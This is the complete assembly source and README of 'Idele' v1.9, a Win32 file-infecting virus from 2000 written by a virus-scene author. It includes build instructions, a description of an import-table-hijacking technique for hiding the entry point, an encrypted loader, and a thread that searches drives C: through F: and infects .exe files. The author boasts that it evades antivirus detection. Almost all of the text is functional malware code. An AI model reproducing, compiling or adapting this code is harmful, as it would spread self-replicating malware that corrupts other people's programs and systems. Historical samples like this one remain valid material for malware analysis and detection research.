Win32.Idele ----------------------------------------------------------------[IDELE.ASM]--- .386p .model flat comment $ Idele virus version 1.9 by Doxtor L. /[T.I], July-December 2000 test version!! (infect goat*.exe files) Disclaimer: This program is a virus. It's not designed to be a destructive one, but anyway it's a virus ! This virus is my third one, designed for Ms-Windows. All tests were performed on Win95/Winnt platforms. But i'm quite sure it runs fine on win98 too. It don't work fine on Win2k. It was written for educational purposes! Greets: -Androgyne : i hope to see soon a win32 virus of your own my "dear student" :) -Bumblebee : Thanks for the informations -Cryptic : Thanks for beta-testing -Del armg0 : are you a reader of "Pif le chien"? :) -Dyrdyr : you're a maths genius, man :) -Mandragore : A day without alcohol/weed is a bad day? -Spanska : fat 25yrs old girls are not necessary ugly ;) -T00fic : Do you like my poetry? :) -Darkman : Tania fan number one :) -Giga : i'm too fat to be able to ride a pony :) -LordJulus : i can't wait for your next tutorials :) -M : heya "marchand de sabl‚s"! -Tally : a new virus for your collection! -T2 : Is there a life be4 the death? Vecna : when is the next full moon? :) ...And all the vxers from undernet irc servers FREE VIRUSES ! Virus is knowledge! So trading viruses with ratios is an opposition to the free spreading of knowledge! Description: This virus uses several viral technics. Checksum/Crc32 routines to recognize API string in export section of Kernel32.dll The main feature is that the sections flags of host aren't modified (except for import table) i.e, if a section is a non-writable one, after infection the section flag is still non-writable. How we do that? The virus uses the GlobalAlloc API. This api is called first, to create a memory space to decrypt and run the main part of virus there. But we need a special routine to force targets to use this api. To do that, we search in Import table of the target, an API string name with 11 or more, letters. We patch the name with "GlobalAlloc" string. At run time, the infected host is loaded in memory by Windows, the address of GlobalAlloc API is set. Windows makes the job for us :) So we need to patch the place this address is, with the correct one, we use GetProcAddress. (we can't pre-calculate a checksum for it because the name of this API isn't known before infection time) The virus uses the allocated memory space to move to/decrypt its main routine. So when the decryption is completed, the virus jumps to that new memory space. It creates an infectious thread and returns to host. The virus uses a *new* EPO technic. The virus don't patch the target code! and the virus don't change the entry point of target PE exe. As far i know , this is the first virus to use the following technic. A Windows application contains in its memory space an array that will be fullfilled with APIs addresses by the operating sytem. The virus at infection time, changes in target the address of the import table and create a small new one. The old table is fullfilled with the virus address. So when the infected host calls an API, the virus will be called first. The first thing, the virus does, is to rebuild the import table of the host at the right place! before infection: Import table Code section API1: >------------------- "call [API1]" XXXX API2: YYYY >------------------- "Call [API2]" (...) (...) After infection: Old import table Code section New import table API1: API1: >virus address< >-----------"call [API1]" XXXX API2: (...) >virus address<: >------------"call [API2]" (...) (...) API(N):(N is often >=4) >GlobalAlloc address< Most people in vx-scene thinks applications in high level language call APIs using only two ways: 1) 2) call API: call [>address in Import table<] (...) API: jmp [>address in Import table<] They are wrong! In notepad.exe of Win95, i have found code like that: mov edi,dword ptr [>Address in Import table<] call edi And believe me, most of applications (Netscape 4.5 ...) can use that way to call an API. An infected program could be unstable due to the way it performs an API call! Happily the applications rarely call an API from Kernel32, using an "unusal" way, at the very beginning of their code ! The W(rite) attribute is set in the section the Import table is to be Win NT4 compatible. Patch the Import table at run time seems impossible under Win2k! Even the use of WriteProcessMemory API don't help to solve that problem:( Happily there is a solution to bypass that...but it's another story :) The infectious routine is a classic one: -Search x target(s) on whole C:,D:,E:,F: drives and infects it/them. -The thread begins with a pause, virus stop during x seconds before to infect. -The virus is composed of 2 parts: a loading routine to create memory space and decrypt the virus there (this routine is located in executable section of host) and the main part of virus located in last section. This virus isn't detected by major anti-viruses at the time it was written. So once again, BE CAREFUL! To compile, use the following file: Syntax is: compile virus (and not "compile virus.asm") [assuming the virus source code is named: virus.asm] The assembler used is tasm 5.0 (c)Borland ///// begin of compile.bat ///// tasm32 /m /ml %1.asm tlink32 /Tpe /aa /c %1,%1.exe,,import32.lib rem pewrite.exe set the write attribute in all sections headers pewrite %1.exe del %1.obj del %1.map ///// End of compile.bat ///// To test the virus change the string "*.exe",0 into "test*.exe",0 Remember the virus size need to be a 4 multiple! $ %out WARNING! %out YOU HAVE JUST COMPILED A FULL FUNCTIONNAL VIRUS! %out ERASE IT, IF YOU DON'T KNOW WHAT YOU'RE DOING! extrn ExitProcess :Proc ;only for the 1st generation extrn MessageBoxA :Proc extrn GetProcAddress :Proc extrn GetModuleHandleA :Proc extrn Sleep :Proc .data T db "Warning!" ,0 Message db "Ready to be infected" ,0ah,0dh db "by Idele " ,0ah,0dh db "virus v 1.9 /[T.I] ?" ,0ah,0dh,0 Message2 db "Exit infection?" ,0 Krl32 db "KERNEL32.DLL",0 EP0 db 0,0 EP db "ExitProcess",0 HereisAddy4Message2 dd 0 Fake_OFT dd offset EP0,0,0,0 Fake_FT dd 0,0,0,0 Addy4EP dd 0 .code ;code executable starts here HOST: mov eax,LoaderLength mov eax,EndVir-BeginVir ;the real size is a multiple of 4 push 30h ;warning message push offset T push offset Message push 0 call MessageBoxA push offset Krl32 ;retrieve Kernel32.dll address call GetModuleHandleA push offset EP ;retrieve ExitProcess address push eax call GetProcAddress mov dword ptr [Addy4EP],eax mov dword ptr [Import],offset Addy4EP mov dword ptr [VA_API],offset EP mov dword ptr [VA_OFT],offset Fake_OFT mov dword ptr [VA_FT],offset Fake_FT mov dword ptr [ApiHack],offset EP lea eax,HereisAddy4Message2 mov dword ptr [eax],offset Msg2 xor ebp,ebp jmp FillUpJump Msg2: push 5000 ;time needed to infect call Sleep push 30h ;exit message push offset T push offset Message2 push 0 call MessageBoxA push 0 ;exit first generation virus call ExitProcess ;[real start of virus]: BeginVir: call Delta Delta: ;compute delta offset pop ebp sub ebp,offset Delta mov eax,dword ptr [esp+32] ;search in stack return ;address mov cl,byte ptr [eax-5] ;read first byte of "call" ;opcode cmp cl,15h ;is 15? jnz Jump_Far ;no...it's a call yyyy mov eax,dword ptr [eax-4] ;...yes it's call [xxxxx] ;read xxxx, xxxx is a pointer ;to API address jmp FillUpJump Jump_Far: ;it's a call yyyy add eax,dword ptr [eax-4] ;what is the destination of inc eax ;"call yyyy"? inc eax ; mov eax,dword ptr [eax] ; ; FillUpJump: mov dword ptr [JumpAway+ebp],eax ComputeKernelAddress: db 8bh,15h ;mov edx,dword [Import] Import dd 0 ;Import is an address in Import table ;[ ]= adress of GlobalAlloc (in second generation) ;***** Search kernel32.dll address in memory ; In :edx=address in kernel32 ;***** Out:edx=kernel32.dll address mov eax,edx Loop: dec edx cmp word ptr [edx],"ZM" jnz Loop MZ_found: ; "MZ" found ;is it the beginning of Kernel? mov ecx,edx mov ecx,[ecx+03ch] add ecx,edx cmp ecx,eax jg Loop ;this test avoid page fault cmp word ptr [ecx] ,"EP" jnz Loop ;***** End of search kernel routine ;***** Search apis addresses needed ; In : edx=IMAGE BASE of KERNEL32 ;***** Out: Searched Apis addresses are put in a Table of Dword mov eax,[edx+3ch] ;eax=RVA of PE-header add eax,edx ;eax=Address of PE-header mov eax,[eax+78h] ;eax=RVA of EXPORT DIRECTORY section add eax,edx ;eax=Address of EXPORT DIRECTORY section mov esi,[eax+20h] ;esi=RVA of the table containing pointers add esi,edx ;esi=Address of this table, ;a pointer to the name of the first ;exported function xor ebx,ebx ;ebx holds Api index dec ebx mov ecx,ApiNb ;number of Apis remaining sub esi,4 MainLoop: add esi,4 inc ebx ;***** Crc computing of the current Api name ; In : esi: RVA of name ;***** Out: Crc variable contains the Crc of current name string ComputeCrc: pushad mov esi,dword ptr [esi] add esi,edx xor ecx,ecx xor eax,eax Again: Lodsb or al,al jz SeeU add cl,al rol eax,cl add ecx,eax jmp Again SeeU: mov dword ptr [Crc+ebp],ecx popad ;***** End of crc computing routine ;***** Test Crc ; In : Esi: Current Api name address ; Out: Esi= following name ;***** Ecx= Api (pointer) index in the "table of names" TestCrc: push eax mov eax,dword ptr [Crc+ebp] mov ecx,ApiNb+1 lea edi,ApiList+ebp repne scasd pop eax jecxz MainLoop Found: pushad add edi,offset CloseHandle-(offset ApiList+4) ;Api position ;in our table mov ecx,dword ptr [eax+36] add ecx,edx lea ecx,[ecx+2*ebx] mov bx,word ptr [ecx] mov ecx,dword ptr [eax+1ch] add ecx,edx mov ecx,dword ptr [ecx+4*ebx] add ecx,edx mov dword ptr [edi],ecx popad Loop MainLoop ;***** End of crc test routine ;***** End of Apis searching routine ;routine: ;on copie les adresses que Windows a mis dans la table FT vers ;la vraie table qui commence … VA_FT ;We need to patch the import table of host. ;But first we need to compute the address of the Api we have replaced ;by GlobalAlloc ;[Compute address of hacked api]: push edx lea ebx,ApiHack+ebp push ebx push edx call dword ptr [_GetProcAddress+ebp] mov dword ptr [ApiOriginalAdd+ebp],eax call dword ptr [GetCurrentProcessId+ebp] push eax push 0 push 10h or 20h or 08h call dword ptr [OpenProcess+ebp] xchg eax,ebx pop edx xor ecx,ecx mov esi,dword ptr [VA_OFT+ebp] lea edi,API_Buffer+ebp ALoop: lodsd or eax,eax jnz FollowMe or ch,ch jnz GetOut mov eax,dword ptr [VA_API+ebp] inc ch jmp ComputeAPI FollowMe: add eax,dword ptr [ImageBase+ebp] inc eax inc eax ComputeAPI: push esi push edi push ecx push edx push eax push edx call dword ptr [_GetProcAddress+ebp] pop edx pop ecx pop edi pop esi stosd inc cl jmp ALoop GetOut: push 0 xor ch,ch shl ecx,2 push ecx lea eax,API_Buffer+ebp push eax push dword ptr [VA_FT+ebp] push ebx call dword ptr [WriteProcessMemory+ebp] ;[Restore host hacked api]: push 0 push 4 lea eax,ApiOriginalAdd+ebp ;source push eax db 68h ;push value HackAdd: ;destination dd 0 push ebx call Dword ptr [WriteProcessMemory+ebp] ;[Create_Thread]: lea ebx,ThreadID+ebp push ebx push 0 push 0 lea ebx,_Thread+ebp push ebx push 0 push 0 call dword ptr [CreateThread+ebp] ;[Go on API call]: popad db 0ffh,25h ;jump [ ] JumpAway dd 0 _Thread: call DeltaOff DeltaOff: pop ebp sub ebp,offset DeltaOff push Miliseconds call dword ptr [_Sleep+ebp] ;[Save current directory]: lea eax,DirExe+ebp push eax push 260 call Dword ptr [GetCurrentDirectoryA+ebp] ;***** Main routine (directory-tree search algorithm) mov dword ptr [Counter+ebp],HowMany mov dword ptr [Depth+ebp],0 SearchDisk: inc dword ptr [Key+ebp] mov eax,dword ptr [Key+ebp] xor edx,edx xor ecx,ecx mov cl,4 div ecx xchg eax,edx add al,43h mov byte ptr [DiskName+ebp],al lea eax,DiskName+ebp push eax call dword ptr [GetDriveTypeA+ebp] cmp al,3 jnz SearchDisk db 0c7h,85h dd offset FileName DiskName db "C" db ":",0 Find0: inc dword ptr [Depth+ebp] push ebx lea eax,FileName+ebp push eax call dword ptr [SetCurrentDirectoryA+ebp] or eax,eax jz Updir0 ;****** InfectCurrentDir lea esi,FileAttributes+ebp push esi lea edi,FindMatch+ebp ;target string name push edi call dword ptr [FindFirstFileA+ebp] ;return a search handle mov ebx,eax ;handle is put into ebx inc eax jz FindF call Infect Next: push esi push ebx call [FindNextFileA+ebp] or eax,eax jz FindF call Infect jmp Next ;***** End of infect current dir routine ;[Findfirst dir]: FindF: push ebx call dword ptr [FindClose+ebp] lea esi,FileAttributes+ebp push esi lea edi,FindMatch2+ebp push edi call dword ptr [FindFirstFileA+ebp] mov ebx,eax inc eax jz Updir0 Find: mov eax,dword ptr [FileAttributes+ebp] and eax,10h jz FindN cmp byte ptr [FileName+ebp],"." jnz Find0 ;[FindNext dir routine]: FindN: lea esi,FileAttributes+ebp push esi push ebx call dword ptr [FindNextFileA+ebp] or eax,eax jnz Find Updir: push ebx call dword ptr [FindClose +ebp] Updir0: dec dword ptr [Depth+ebp] jz Exit pop ebx lea eax,DotDot+ebp push eax call dword ptr [SetCurrentDirectoryA+ebp] jmp FindN Exit0: pop eax Exit: push ebx call dword ptr [FindClose+ebp] ;[Restore saved directory]: lea eax,DirExe+ebp push eax call dword ptr [SetCurrentDirectoryA+ebp] jmp _Thread Infect: pushad TestFile: add dword ptr [FileSize+ebp],VirLength ;***** Test if the file is a true PE-executable file call OpenFileStuff jc ExitInfectError push edx ;save mapping address cmp dword ptr [edx+3ch],200h ;Avoid Page Fault jg ExitInfectError0 add edx,dword ptr [edx+3ch] ;edx points to PE-header cmp word ptr [edx],"EP" ;true PE exe there? jnz ExitInfectError0 ;***** End of EXE-PE test ;***** Already infected? pop ecx cmp word ptr [ecx+12h],"IT" ;infected? jz ExitInfectError push ecx ;**** End of infection test mov edi,edx add edi,18h ;edi=beginning of optional header ;[Compute RVA of first section header]: mov ebx,dword ptr [edi+10h] ;ebx=Entry Point RVA push ebx ;save it movzx ecx,word ptr [edx+14h] ;cx=size of optionnal header add edi,ecx ;edi points to 1st section header movzx ecx,word ptr [edx+06h] ;cx= number of sections mov dword ptr [SectN+ebp],ecx mov ebx,edi ;ebx points on 1st section header ;[compute last section header address]: xor eax,eax ;set eax=0 dec ecx ;ecx=number of sections -1 mov esi,edi ;esi=first section header ;address mov al,28h ;al=size of a section header mul cl ;eax=28h*(number of section-1) add esi,eax ;esi=pointer to last section ;header ;ebx,edi=beginning of 1st section header pop eax ;put Entry Point RVA in eax ;***** Search code section: ; In : ebx holds file pointer to first section header ; : eax holds Entry Point RVA ;***** Out: ebx holds File ptr to the "code section" NotEnough: add ebx,28h cmp dword ptr [ebx+12],eax jg FoundCode loop NotEnough jmp ExitInfectError0 FoundCode: sub ebx,28h ;***** Search code section end cmp dword ptr [esi+16],0 ;don't want to infect files jz ExitInfectError0 ;with rawdata size=0 ... ;no real section on disk here ;if we try ...file is overwritten! mov eax,dword ptr [esi+24h] ;don't want to infect files and eax,80000000h ;with a last section writable jnz ExitInfectError0 ;surely an exe archive or packed file ;edi= begin of section headers ;ebx= begin of code section ;eax= begin of code section header mov eax,edi pop edi ;restore Map Address push edi ;save " " push eax mov ecx,LoaderLength dec ecx add edi,dword ptr [ebx+10h] add edi,dword ptr [ebx+14h] dec edi Empty: std xor al,al repe scasb xchg eax,edi pop edi or ecx,ecx cld jnz ExitInfectError0 ;[Import table patching routine]: pushad mov eax,dword ptr [edx+18h+1ch] ;save on stack ImageBase mov dword ptr [ImageBase+ebp],eax push eax mov eax,dword ptr [edx+80h] ;eax= address of the ;"import table" ;[search import section]: ;in: edi=map pointer to first section header pushad SearchImport: add edi,28h cmp dword ptr [edi+12],eax jg FoundImport jmp SearchImport FoundImport: sub edi,28h or dword ptr [edi+24h],80000000h ;set W attribute to ;Import section mov eax,dword ptr [edi+12] add eax,dword ptr [edi+10h] mov esi,eax ;esi=RVA to the end of import ;section call Rva2Offset ;eax=map pointer to the end of ;import section xor ecx,ecx ;[How many dword are free in the end of the import section]: HowManyDW: sub eax,4 sub esi,4 cmp dword ptr [eax],0 jz HowManyDW add eax,8 ;we don't use the first free dword add esi,8 mov dword ptr [RVA_NewFT+ebp],esi mov dword ptr [FP_NewFT+ebp],eax popad ;end of search import section ;eax=RVA "Imports table" ;ebx=RVA "Sections table" call Rva2Offset ;eax=file pointer to Import table xchg eax,edi ;edi= " " " " " SearchDll: mov eax,dword ptr [edi+12] or eax,eax je _NotFound call Rva2Offset cmp dword ptr [eax],"NREK" ;are there imports je DllFound ;from kernel32.dll? cmp dword ptr [eax],"nrek" ; " " je DllFound add edi,20 jmp SearchDll _NotFoundV: _NotFound: popad jmp ExitInfectError0 DllFound: ;edi= file pointer to KERNEL32.DLL structure in target mov dword ptr [edi+4],0 ;TimeDate stamp set to 0 mov dword ptr [edi+8],0 mov eax,dword ptr [edi] ;eax=RVA of OriginalFirstThunk add edi,16 mov edx,dword ptr [edi] ;edx=RVA of FirstThunk mov dword ptr [FP_FieldFT+ebp],edi push eax ;compute file ptr to host First Thunk mov eax,edx call Rva2Offset mov dword ptr [FP_FT+ebp],eax pop eax pop ecx ;restore image base push ecx ;save it again mov dword ptr [RVA_FT+ebp],edx add ecx,edx ;compute VA of FirstThunk mov dword ptr [VA_FT+ebp],ecx ;save it or eax,eax jz No_OFT pushad push eax add eax,dword ptr [ImageBase+ebp] mov dword ptr [VA_OFT+ebp],eax pop eax call Rva2Offset mov dword ptr [FP_OFT+ebp],eax ;File pointer to Original first ;thunk ;[Compute the number of imported APIs from KERNEL32.DLL]: xor ecx,ecx sub eax,4 ApiScan: inc ecx add eax,4 cmp dword ptr [eax],0 jnz ApiScan dec ecx ;ecx holds number of imported APIs from K32 mov dword ptr [SizeT+ebp],ecx ;********************************************************************* popad jmp OFT_Found No_OFT: mov eax,edx OFT_Found: call Rva2Offset ;eax contains the RVA of an array of ;RVAs. ;Each of these RVAs points to a structure ;The number of structures equals the ;number of imported functions from ;KERNEL32.DLL ;We need to convert eax into a file ;pointer. sub edx,4 sub eax,4 lea edi,ApiHack+ebp Loop2: add eax,4 ;eax=map ptr to OFT array add edx,4 ;edx= rva, browsing ft array mov esi,dword ptr [eax] ;read an RVA of array or esi,esi jz _NotFound test esi,80000000h ;ordinal? jnz Loop2 xor ecx,ecx xchg eax,esi ;convert RVA to file offset call Rva2Offset xchg eax,esi inc esi ;esi points to api name inc esi push edi push esi DoAgain: ;move the api name into ApiHack movsb inc ecx cmp byte ptr [esi-1],0 ;end of string? jnz DoAgain pop esi pop edi cmp ecx,12 ;string + ",0" is 12 char? jl Loop2 ;not enough?...go back to Loop2 pushad add eax,4 mov esi,dword ptr [eax] inc esi inc esi add esi,dword ptr [ImageBase+ebp] mov dword ptr [VA_API+ebp],esi mov dword ptr [eax],0 popad xchg esi,edi lea esi,GlobalAPI+ebp mov cl,12 ;GlobalAlloc string replace rep movsb ;one of api of the host pop edi ;edi =ImageBase of target add edx,edi ;address in Import table mov dword ptr [HackAdd+ebp],edx mov dword ptr [API_Field+ebp],edx popad ;***** End Import table Patching routine pop edi ;restore MapAddress push eax ;save pointer to code loader add dword ptr [Key+ebp],12345678h ;modify key mov word ptr [edi+12h],"IT" ;mark the infected target mov dword ptr [edx+18h+24h],200h ;set FileAligment=200h mov ecx,dword ptr [esi+0ch] add edi,dword ptr [esi+14h] ;pointer to reloc section cmp dword ptr [edx+18h+96+40],ecx jnz NoReloc cmp dword ptr [esi+10h],0a00h jnge NoReloc ;[Erase Relocation Section]: mov dword ptr [edx+18h+96+40],0 mov dword ptr [edx+18h+96+44],0 mov dword ptr [esi],"adP." ;change the section name mov dword ptr [esi+4],"at" add ecx,dword ptr [ImageBase+ebp] mov dword ptr [LastSectionCode+ebp],ecx sub dword ptr [FileSize+ebp],VirLength jmp CopyEncrypt ;************************************************************************ NoReloc: add edi,dword ptr [esi+10h] ;add rounded up last section raw-size ;[Compute beginning of code in the last section ,in memory]: mov ecx,dword ptr [esi+0ch] ;last section RVA in memory add ecx,dword ptr [esi+10h] ;add last section rounded up size add ecx,dword ptr [ImageBase+ebp] mov dword ptr [LastSectionCode+ebp],ecx ;[Update size field in target last section header]: add dword ptr [esi+10h],0a00h add dword ptr [esi+08h],1000h ;[Update size fields in target optional header]: add dword ptr [edx+50h],1000h CopyEncrypt: mov ecx,dword ptr [RVA_NewFT+ebp] mov esi,dword ptr [FP_FieldFT+ebp] mov dword ptr [esi],ecx mov esi,dword ptr [API_Field+ebp] sub esi,dword ptr [RVA_FT+ebp] add esi,dword ptr [RVA_NewFT+ebp] mov dword ptr [ReturnAdd+ebp],esi mov dword ptr [Import+ebp],esi ;[Copy and encrypt code in the last section]: mov ecx,(EndVir-BeginVir)/4 lea esi,BeginVir+ebp call Crypt ;[ClearHeap]: push edi mov ecx,dword ptr [FileSize+ebp] sub edi,dword ptr [MapAddress+ebp] sub ecx,edi ;ecx=number of useless bytes in ;the heap pop edi xor eax,eax ;set eax to 0 Nullify: repne stosb ;[compute new entry point]: mov eax,dword ptr [ebx+0ch] add eax,dword ptr [ebx+10h] mov ecx,LoaderLength sub eax,ecx ;eax=RVA of Loader add eax,dword ptr [edx+18h+1ch] ;add ImageBase push ecx ;save loader size mov ecx,dword ptr [SizeT+ebp] mov edi,dword ptr [FP_FT+ebp] rep stosd mov esi,dword ptr [FP_OFT+ebp] mov edi,dword ptr [FP_NewFT+ebp] CopyMore: movsd cmp dword ptr [esi],0 jnz CopyMore pop ecx ;restore loader size ;[Copy loader code to target file on disk]: pop edi ;restore pointer (on disk) to code loader lea esi,BeginLoader+ebp repne movsb call CloseFileStuff popad dec dword ptr [Counter+ebp] jz Exit0 ret ExitInfectError2: pop eax ExitInfectError0: pop eax ExitInfectError: sub dword ptr [FileSize+ebp],VirLength call CloseFileStuff popad ret OpenFileStuff: push 0 push 0 push 3 push 0 push 1 push 80000000h or 40000000h ;Read and Code abilities lea eax,FileName+ebp push eax call dword ptr [CreateFileA+ebp] mov dword ptr [FileHandle+ebp],eax ;save FileHandle push 0 push dword ptr [FileSize+ebp] push 0 push 4 push 0 push dword ptr [FileHandle+ebp] call dword ptr [CreateFileMappingA+ebp] mov dword ptr [MapHandle+ebp],eax push dword ptr [FileSize+ebp] push 0 push 0 push 2 push dword ptr [MapHandle+ebp] call dword ptr [MapViewOfFile+ebp] or eax,eax jz ExitOpenFileStuffError mov dword ptr [MapAddress+ebp],eax ;eax=Address of Mapping xchg eax,edx clc ret ExitOpenFileStuffError: stc ret CloseFileStuff: UnMap: push dword ptr [MapAddress+ebp] call dword ptr [UnmapViewOfFile+ebp] CloseMapHandle: push dword ptr [MapHandle+ebp] call dword ptr [CloseHandle+ebp] ResizeFile: push 0 push 0 push dword ptr [FileSize+ebp] push dword ptr [FileHandle+ebp] call dword ptr [SetFilePointer+ebp] MarkEndOfFile: push dword ptr [FileHandle+ebp] call dword ptr [SetEndOfFile+ebp] RestoreTime: lea eax,LastWriteTime+ebp push eax lea eax,LastAccessTime+ebp push eax Lea eax,CreationTime+ebp push eax push dword ptr [FileHandle+ebp] call dword ptr [SetFileTime+ebp] CloseFile: push dword ptr [FileHandle+ebp] call dword ptr [CloseHandle+ebp] RestoreFileAttributs: push dword ptr [FileAttributes+ebp] lea eax,FileName+ebp push eax call dword ptr [SetFileAttributesA+ebp] ret ;change a RVA to a file pointer ;In : ebx points to first section ;Out: eax contains the file offset Rva2Offset: push ebx push ecx mov ecx,dword ptr [SectN+ebp] _Loop: cmp dword ptr [ebx+12],eax jg _Find NoRawData: add ebx,28h loop _Loop _Find: sub eax,dword ptr [ebx-28h+12] add eax,dword ptr [ebx-28h+20] add eax,dword ptr [MapAddress+ebp] pop ecx pop ebx ret BeginLoader: pushad push 2000h push 0 db 0ffh,15h ;call GlobalAlloc ReturnAdd dd 0 push eax ;prepare jump to virus xchg eax,edi ;added to modify scan string mov ecx,(VirLength)/4 db 0beh ;mov esi,**** LastSectionCode dd 0 Crypt: lodsd db 35h Key dd 0abcdef12h stosd dec ecx jnz Crypt ret ;go to beginning of code EndLoader: Constants: ApiNb equ 21 MaxPath equ 260 Miliseconds equ 1500 HowMany equ 1 VirLength equ 0a00h VirLength0 equ EndVir0-BeginVir LoaderLength equ EndLoader-BeginLoader Sign db "Idele virus version 1.9" db "DoxtorL./[T.I]/Dec.Y2K" SizeT dd 0 VA_API dd 0 ImageBase dd 0 FP_OFT dd 0 VA_OFT dd 0 FP_FieldFT dd 0 FP_FT dd 0 RVA_FT dd 0 VA_FT dd 0 FP_NewFT dd 0 RVA_NewFT dd 0 VA_NewFT dd 0 FindMatch db "*.exe",0 FindMatch2 db "*.*",0 DotDot db "..",0 GlobalAPI db "GlobalAlloc",0 ApiHack db "GlobalAlloc",0 ;only for the ;1st generation db 26 dup (0) ;reserved for char ;of api name found ApiList dd 0fdbe9ddfh ;CloseHandle dd 04b00fba1h ;CreateFileA dd 00d6ea22eh ;CreateFileMappingA dd 0be307c51h ;CreateThread dd 0be7b8631h ;FindClose dd 0c915738fh ;FindFirstFileA dd 08851f43dh ;FindNextFileA dd 028f8c6fbh ;GetCurrentDirectoryA dd 00029ecfbh ;GetCurrentProcessId dd 09c3a5210h ;GetDriveTypeA dd 040bf2f84h ;GetProcAddress dd 032beddc3h ;MapViewOfFile dd 0c329f65bh ;OpenProcess dd 08e0e5487h ;SetCurrentDirectoryA dd 0bc738ae6h ;SetEndOfFile dd 050665047h ;SetFileAttributesA dd 06d452a3ah ;SetFilePointer dd 09f69de76h ;SetFileTime dd 03a00e23bh ;Sleep dd 0fae00d65h ;UnmapViewOfFile dd 01e9fa310h ;WriteProcessMemory EndVir: ;What is following isn't appended to target ;ApiAddresses: CloseHandle dd 0 CreateFileA dd 0 CreateFileMappingA dd 0 CreateThread dd 0 FindClose dd 0 FindFirstFileA dd 0 FindNextFileA dd 0 GetCurrentDirectoryA dd 0 GetCurrentProcessId dd 0 GetDriveTypeA dd 0 _GetProcAddress dd 0 MapViewOfFile dd 0 OpenProcess dd 0 SetCurrentDirectoryA dd 0 SetEndOfFile dd 0 SetFileAttributesA dd 0 SetFilePointer dd 0 SetFileTime dd 0 _Sleep dd 0 UnmapViewOfFile dd 0 WriteProcessMemory dd 0 ;Variables: FileHandle dd 0 MapHandle dd 0 MapAddress dd 0 Counter dd 0 Crc dd 0 Depth dd 0 ThreadID dd 0 SectN dd 0 ApiOriginalAdd dd 0 API_Field dd 0 ;search structure: FileAttributes dd ? ; attributes CreationTime dd ?,? ; time of creation LastAccessTime dd ?,? ; last access time LastWriteTime dd ?,? ; last modificationm FileSizeHigh dd ? ; filesize FileSize dd ? ; Reserved0 dd ? ; Reserved1 dd ? ; FileName db MaxPath DUP (?) ; long filename AlternateFileName db 13 DUP (?) ; short filename DirExe db MaxPath DUP (?) EndVir0: API_Buffer: dd 16 dup (0) end HOST ----------------------------------------------------------------[IDELE.ASM]--- -----------------------------------------------------------------[READ.1ST]--- Doxtor L./[Technological Illusions] presents: IDELE virus version 1.9 July-December 2000 Description: This is a per-process encrypted virus. It uses a new EPO (*) technic (as far i know), nothing is modified in the host code part. The virus searchs targets on C:,D:,E:,F: drives when ever those drives are accessible. The virus works fine on Win9x/Win nt4 platforms, but don't work on Win 2k platform. This virus is undetected at the time it was completed, yet it's not destructive, but it's a computer virus so use it at your own risks ! I can't be held as responsible for use/misuse of this program. This program was only designed for research aims. (Is fire guns dealers can be held also as responsible for the death of a young guy somewhere in the world when someone uses a machine gun to kill him ?) (*) E.P.O=Entry Point Obscured -----------------------------------------------------------------[READ.1ST]---